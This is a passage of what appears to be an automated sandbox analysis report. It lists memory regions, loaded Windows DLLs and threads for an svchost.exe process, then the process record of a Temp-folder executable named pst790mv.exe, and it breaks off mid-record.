0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 335 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 336 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 337 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 338 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 339 start_va = 0x5c0000 end_va = 0x747fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 340 start_va = 0x750000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 341 start_va = 0x8e0000 end_va = 0xcd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 342 start_va = 0xce0000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 343 start_va = 0xd60000 end_va = 0xddffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 344 start_va = 0xde0000 end_va = 0x10aefff entry_point = 0xde0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 345 start_va = 0x10b0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 346 start_va = 0x11f0000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 347 start_va = 0x1270000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 348 start_va = 0x1380000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 349 start_va = 0x14a0000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 350 start_va = 0x14b0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 351 start_va = 0x1640000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 352 start_va = 0x16d0000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 353 start_va = 0x1760000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 354 start_va = 0x17e0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 355 start_va = 0x18d0000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 356 start_va = 0x19b0000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 357 start_va = 0x1a90000 end_va = 0x1b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 358 start_va = 0x1b10000 end_va = 0x1b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b10000" filename = "" Region: id = 359 start_va = 0x1bd0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 360 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 361 start_va = 0x1cd0000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 362 start_va = 0x1dd0000 end_va = 0x1e8ffff entry_point = 0x1dd0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 363 start_va = 0x2010000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 364 start_va = 0x21c0000 end_va = 0x223ffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 365 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 366 start_va = 0x22e0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 367 start_va = 0x73580000 end_va = 0x73582fff entry_point = 0x73580000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 368 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x76b8a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 369 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x76c85ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 370 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 371 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 372 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 373 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 374 start_va = 0xff0c0000 end_va = 0xff0cafff entry_point = 0xff0c0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 375 start_va = 0x7fef5500000 end_va = 0x7fef550bfff entry_point = 0x7fef550602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 376 start_va = 0x7fef5750000 end_va = 0x7fef5827fff entry_point = 0x7fef5750000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 377 start_va = 0x7fef68d0000 end_va = 0x7fef694bfff entry_point = 0x7fef68d0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 378 start_va = 0x7fef7440000 end_va = 0x7fef7457fff entry_point = 0x7fef7440000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 379 start_va = 0x7fef7480000 end_va = 0x7fef74dffff entry_point = 0x7fef7480000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 380 start_va = 0x7fef7590000 end_va = 0x7fef7597fff entry_point = 0x7fef7591414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 381 start_va = 0x7fef7730000 end_va = 0x7fef77a3fff entry_point = 0x7fef77366f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 382 start_va = 0x7fef80e0000 end_va = 0x7fef80effff entry_point = 0x7fef80e0000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 383 start_va = 0x7fef80f0000 end_va = 0x7fef8101fff entry_point = 0x7fef80f0000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 384 start_va = 0x7fef9ba0000 end_va = 0x7fef9bb8fff entry_point = 0x7fef9ba0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 385 start_va = 0x7fef9c10000 end_va = 0x7fef9c73fff entry_point = 0x7fef9c10000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 386 start_va = 0x7fef9c80000 end_va = 0x7fef9cf0fff entry_point = 0x7fef9c80000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 387 start_va = 0x7fefa590000 end_va = 0x7fefa59afff entry_point = 0x7fefa5912e0 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 388 start_va = 0x7fefa5a0000 end_va = 0x7fefa5b8fff entry_point = 0x7fefa5a177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 389 start_va = 0x7fefa5c0000 end_va = 0x7fefa5d4fff entry_point = 0x7fefa5c12a0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 390 start_va = 0x7fefa710000 end_va = 0x7fefa727fff entry_point = 0x7fefa711130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 391 start_va = 0x7fefb1c0000 end_va = 0x7fefb1d7fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 392 start_va = 0x7fefb1e0000 end_va = 0x7fefb1f0fff entry_point = 0x7fefb1e0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 393 start_va = 0x7fefb210000 end_va = 0x7fefb262fff entry_point = 0x7fefb212b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 394 start_va = 0x7fefb340000 end_va = 0x7fefb349fff entry_point = 0x7fefb340000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 395 start_va = 0x7fefb360000 end_va = 0x7fefb36afff entry_point = 0x7fefb361198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 396 start_va = 0x7fefb370000 end_va = 0x7fefb396fff entry_point = 0x7fefb3798bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 397 start_va = 0x7fefb3e0000 end_va = 0x7fefb446fff entry_point = 0x7fefb3f6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 398 start_va = 0x7fefb480000 end_va = 0x7fefb48bfff entry_point = 0x7fefb480000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 399 start_va = 0x7fefb500000 end_va = 0x7fefb514fff entry_point = 0x7fefb5060d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 400 start_va = 0x7fefbea0000 end_va = 0x7fefbeabfff entry_point = 0x7fefbea1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 401 start_va = 0x7fefbf70000 end_va = 0x7fefbf76fff entry_point = 0x7fefbf714b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 402 start_va = 0x7fefc060000 end_va = 0x7fefc07afff entry_point = 0x7fefc060000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 403 start_va = 0x7fefc080000 end_va = 0x7fefc09dfff entry_point = 0x7fefc0813b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 404 start_va = 0x7fefc1d0000 end_va = 0x7fefc1d9fff entry_point = 0x7fefc1d0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 405 start_va = 0x7fefc2d0000 end_va = 0x7fefc316fff entry_point = 0x7fefc2d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 406 start_va = 0x7fefc3c0000 end_va = 0x7fefc3effff entry_point = 0x7fefc3c0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 407 start_va = 0x7fefc3f0000 end_va = 0x7fefc44afff entry_point = 0x7fefc3f6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 408 start_va = 0x7fefc560000 end_va = 0x7fefc566fff entry_point = 0x7fefc56142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 409 start_va = 0x7fefc570000 end_va = 0x7fefc5c4fff entry_point = 0x7fefc571054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 410 start_va = 0x7fefc5d0000 end_va = 0x7fefc5e6fff entry_point = 0x7fefc5d32b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 411 start_va = 0x7fefc830000 end_va = 0x7fefc843fff entry_point = 0x7fefc830000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 412 start_va = 0x7fefcb70000 end_va = 0x7fefcb7afff entry_point = 0x7fefcb70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 413 start_va = 0x7fefcba0000 end_va = 0x7fefcbc4fff entry_point = 0x7fefcba9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 414 start_va = 0x7fefcbd0000 end_va = 0x7fefcbdefff entry_point = 0x7fefcbd1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 415 start_va = 0x7fefcbe0000 end_va = 0x7fefcc70fff entry_point = 0x7fefcbe1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 416 start_va = 0x7fefccc0000 end_va = 0x7fefccd3fff entry_point = 0x7fefccc10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 417 start_va = 0x7fefcce0000 end_va = 0x7fefcceefff entry_point = 0x7fefcce19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 418 start_va = 0x7fefd000000 end_va = 0x7fefd06afff entry_point = 0x7fefd0030e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 419 start_va = 0x7fefd350000 end_va = 0x7fefd3e8fff entry_point = 0x7fefd351c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 420 start_va = 0x7fefe440000 end_va = 0x7fefe56cfff entry_point = 0x7fefe48ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 421 start_va = 0x7fefe570000 end_va = 0x7fefe772fff entry_point = 0x7fefe593330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 422 start_va = 0x7fefe780000 end_va = 0x7fefe85afff entry_point = 0x7fefe7a0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 423 start_va = 0x7fefe860000 end_va = 0x7fefe968fff entry_point = 0x7fefe861064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 424 start_va = 0x7fefe970000 end_va = 0x7fefea0efff entry_point = 0x7fefe9725a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 425 start_va = 0x7fefea10000 end_va = 0x7fefeae6fff entry_point = 0x7fefea13274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 426 start_va = 0x7fefeaf0000 end_va = 0x7fefeafdfff entry_point = 0x7fefeaf1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 427 start_va = 0x7fefeb00000 end_va = 0x7fefeb66fff entry_point = 0x7fefeb0b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 428 start_va = 0x7fefeb70000 end_va = 0x7fefebe0fff entry_point = 0x7fefeb81e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 429 start_va = 0x7fefec10000 end_va = 0x7fefecd8fff entry_point = 0x7fefec8a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 430 start_va = 0x7fefeec0000 end_va = 0x7fefeeedfff entry_point = 0x7fefeec1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 431 start_va = 0x7fefeef0000 end_va = 0x7fefeef7fff entry_point = 0x7fefeef1504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 432 start_va = 0x7fefef00000 end_va = 0x7fefef1efff entry_point = 0x7fefef060e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 433 start_va = 0x7feff050000 end_va = 0x7feff09cfff entry_point = 0x7feff051070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 434 start_va = 0x7feff0b0000 end_va = 0x7feff0b0fff entry_point = 0x7feff0b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 435 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 436 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 437 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 438 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 439 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 440 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 441 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 442 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 443 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 444 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 445 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 446 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 447 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 448 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 449 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 450 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 451 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 12 os_tid = 0x6f8 Thread: id = 13 os_tid = 0x7a8 Thread: id = 14 os_tid = 0x7d0 Thread: id = 15 os_tid = 0x7ac Thread: id = 16 os_tid = 0x790 Thread: id = 17 os_tid = 0x78c Thread: id = 18 os_tid = 0x6fc Thread: id = 19 os_tid = 0x6f4 Thread: id = 20 os_tid = 0x53c Thread: id = 21 os_tid = 0x51c Thread: id = 22 os_tid = 0xf0 Thread: id = 23 os_tid = 0xc8 Thread: id = 24 os_tid = 0x3f8 Thread: id = 25 os_tid = 0x3f0 Thread: id = 26 os_tid = 0x3dc Thread: id = 27 os_tid = 0x9fc Thread: id = 30 os_tid = 0xa78 Thread: id = 49 os_tid = 0x98c Thread: id = 50 os_tid = 0x7d4 Process: id = "3" image_name = "pst790mv.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe" page_root = "0x51bf9000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9a8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 500 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 501 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 502 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 503 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 504 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 505 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 506 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 507 start_va = 0x10000000 end_va = 0x10082fff entry_point = 0x10000000 region_type = mapped_file name = "pst790mv.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe") Region: id = 508 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 509 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 510 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 511 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 512 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 513 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 514 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 515 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 516 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 517 start_va = 0x350000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 518 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 519 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 520 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x74510000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 521 start_va = 0x570000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 522 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 523 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x76600000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 524 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 525 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 527 start_va = 